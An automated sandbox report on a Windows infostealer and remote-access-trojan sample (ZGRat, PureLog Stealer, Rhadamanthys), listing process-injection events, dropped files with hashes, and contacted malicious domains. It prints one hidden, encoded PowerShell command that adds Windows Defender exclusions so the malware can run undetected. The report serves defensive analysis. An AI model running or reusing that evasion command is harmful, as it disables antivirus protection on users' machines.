Malware Analysis Report

2024-10-23 21:47

Sample ID 240311-s8z8gaaf85
Target c0facaa9561e361afe9d92d38e2793a0
SHA256 d8eb6d3fe02a890173827c242182acd22aa699e4bbd918fd22b95c00aa3a6445
Tags
purelogstealer zgrat rat stealer upx rhadamanthys
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d8eb6d3fe02a890173827c242182acd22aa699e4bbd918fd22b95c00aa3a6445

Threat Level: Known bad

The file c0facaa9561e361afe9d92d38e2793a0 was found to be: Known bad.

Malicious Activity Summary

purelogstealer zgrat rat stealer upx rhadamanthys

ZGRat

PureLog Stealer payload

Rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Detect ZGRat V1

PureLog Stealer

Downloads MZ/PE file

Checks computer location settings

UPX packed file

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Suspicious use of SetThreadContext

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-11 15:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-11 15:48

Reported

2024-03-11 15:51

Platform

win7-20240221-en

Max time kernel

132s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

PureLog Stealer

stealer purelogstealer

PureLog Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Downloads MZ/PE file

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TypeId\oubfbwcxu\AttributeString.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TypeId\oubfbwcxu\AttributeString.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TypeId\oubfbwcxu\AttributeString.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TypeId\oubfbwcxu\AttributeString.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1152 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 1152 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 1152 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 1152 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 1152 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe
PID 1152 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe
PID 1152 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe
PID 1152 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe
PID 1152 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe
PID 2308 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 2308 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 2308 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 2308 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 2308 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 2880 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 2880 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 2880 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 2880 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 1148 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 1148 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 1148 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 1148 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1148 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1612 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 1612 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe

Processes

C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe

"C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe"

C:\Users\Admin\AppData\Local\Temp\vctuacx.exe

"C:\Users\Admin\AppData\Local\Temp\vctuacx.exe"

C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe

"C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe"

C:\Users\Admin\AppData\Local\Temp\vctuacx.exe

"C:\Users\Admin\AppData\Local\Temp\vctuacx.exe"

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

"C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe" 0

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

"C:\Users\Admin\AppData\Local\Temp\BBLb.exe"

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {F9F9DEE9-A1F5-4B36-B2D0-38B672C559E7} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:S4U:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

"C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe" 0

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 124

C:\Windows\system32\taskeng.exe

taskeng.exe {6A780D5A-0870-4CAE-9340-956D20C03FFB} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\TypeId\oubfbwcxu\AttributeString.exe

C:\Users\Admin\AppData\Local\TypeId\oubfbwcxu\AttributeString.exe

C:\Users\Admin\AppData\Local\TypeId\oubfbwcxu\AttributeString.exe

C:\Users\Admin\AppData\Local\TypeId\oubfbwcxu\AttributeString.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA

Network

Country Destination Domain Proto
US 8.8.8.8:53 hubvera.ac.ug udp
RU 91.215.85.223:80 hubvera.ac.ug tcp
US 8.8.8.8:53 ddlakava.ac.ug udp
US 8.8.8.8:53 bit.do udp
US 23.21.31.78:80 bit.do tcp
US 23.21.31.78:80 bit.do tcp
US 8.8.8.8:53 rebrand.ly udp
US 15.197.137.111:80 rebrand.ly tcp
US 8.8.8.8:53 fran.ac.ug udp
US 8.8.8.8:53 fransceysse.ac.ug udp
US 8.8.8.8:53 tinyurl.com udp
US 104.20.138.65:80 tinyurl.com tcp
US 8.8.8.8:53 kode.ac.ug udp
US 8.8.8.8:53 kodekode.ac.ug udp
US 8.8.8.8:53 tuekisa.ac.ug udp
US 8.8.8.8:53 partadino.ac.ug udp
RU 91.215.85.223:80 partadino.ac.ug tcp
US 8.8.8.8:53 markinda.xyz udp
US 8.8.8.8:53 markinda.top udp
US 23.21.31.78:80 bit.do tcp
US 23.21.31.78:80 bit.do tcp
US 15.197.137.111:80 rebrand.ly tcp
US 8.8.8.8:53 movescx.top udp
US 8.8.8.8:53 cointra.ac.ug udp
US 8.8.8.8:53 muylove.ac.ug udp
US 8.8.8.8:53 partiad.top udp
US 8.8.8.8:53 partiad.xyz udp

Files

memory/1152-2-0x0000000000240000-0x0000000000241000-memory.dmp

\Users\Admin\AppData\Local\Temp\vctuacx.exe

MD5 d6bfa5d4d5d67dd73013e5b400cac2e7
SHA1 725f7fec0fd1f245c44ab1c228cd349a5e12bd71
SHA256 fa40dc2c8055f953099d7d354ba97fbf3a5f3aa501ce95cb8cefa810b80ea5d4
SHA512 e5d58b64de4d398290d0cd79d44a516ca2528bd183566926ea1f3b9211b20fa5c2244bcc8bd3cc1f3b1d470dc257b72b8d3530d682fff00b7b52227c6c3c7808

memory/1988-13-0x0000000000400000-0x0000000000667000-memory.dmp

memory/1152-12-0x00000000006C0000-0x00000000006C7000-memory.dmp

memory/1988-16-0x0000000000400000-0x0000000000663000-memory.dmp

memory/1988-15-0x0000000000400000-0x0000000000667000-memory.dmp

memory/2308-19-0x00000000001C0000-0x00000000001C1000-memory.dmp

memory/2880-23-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1988-25-0x0000000000400000-0x0000000000667000-memory.dmp

memory/2880-29-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1988-24-0x0000000000400000-0x0000000000667000-memory.dmp

memory/1988-31-0x0000000000030000-0x0000000000031000-memory.dmp

memory/2880-32-0x0000000000270000-0x0000000000271000-memory.dmp

memory/1988-18-0x0000000000400000-0x0000000000667000-memory.dmp

memory/1988-37-0x0000000010000000-0x000000001002F000-memory.dmp

\Users\Admin\AppData\Local\Temp\bassmod.dll

MD5 e3a6587ba5a4ee4514ecaa4265dd9b2c
SHA1 b44bb9b5fc3478fa6ea5140603857ee0c2d4c4fd
SHA256 566934a049ae41fe36e2e122825875e5c02d4db083e744a7a3c94f456cec2f94
SHA512 90f4e5ceac00a0815452ef951feb3aa29e6ef408d8d4cda023c3fdd49ba0238e06589cee9cc0be842eddd1b02bd1d448d9ab8bdaed70651b38d6074c9f99d22f

memory/1988-38-0x0000000000320000-0x0000000000321000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 1a917a85dcbb1d3df5f4dd02e3a62873
SHA1 567f528fec8e7a4787f8c253446d8f1b620dc9d6
SHA256 217fbf967c95d1359314fcd53ae8d04489eb3c7bdc1f22110d5a8a476d1fc92e
SHA512 341acbd43efac1718c7f3e3795549acf29237a2675bdadcb7e52ce18aac6dcc6ae628e1b6edfa2338ed6d9923c148cb4322c75fad86d5c0e6f2327c2270563ec

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 6dad17a1d628886f2c1d5d73ebfbf744
SHA1 272c79fe0abaa326f156e47e8d0ee028b6b4b1bb
SHA256 23c70c027597b9c028871567652d1cc901f73f03c9600086ec9a9b99df0efda2
SHA512 7e108e46f005116a2be1fe86bd7c654c77b9e96b2ce0b5e2693642259c83099022790aa4e456c2c96aad6329eaacb734dccc1a971c15e31c705454d8b6245b98

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 a57729fb7bff6062d9aae738e04b264f
SHA1 152b25d01d4042f9a17ad76a0f4cdd90a90005e7
SHA256 541e3a75f3d258e30c211866fe1b75e573dfd00e8488d10d1e6fafa17d0bf145
SHA512 059fed22bb1094accd1ce156827aaede68269bc1c6ea8bcce1992117239df9923ddb02c7619d9f55723199dfda6278316b53c74af72e62233ef9dc96cd6c1bf9

memory/1988-49-0x0000000000400000-0x0000000000663000-memory.dmp

memory/1148-50-0x00000000003A0000-0x00000000005C8000-memory.dmp

memory/1148-51-0x0000000074430000-0x0000000074B1E000-memory.dmp

memory/1148-52-0x00000000049A0000-0x0000000004BA8000-memory.dmp

memory/1148-53-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-54-0x00000000049A0000-0x0000000004BA3000-memory.dmp

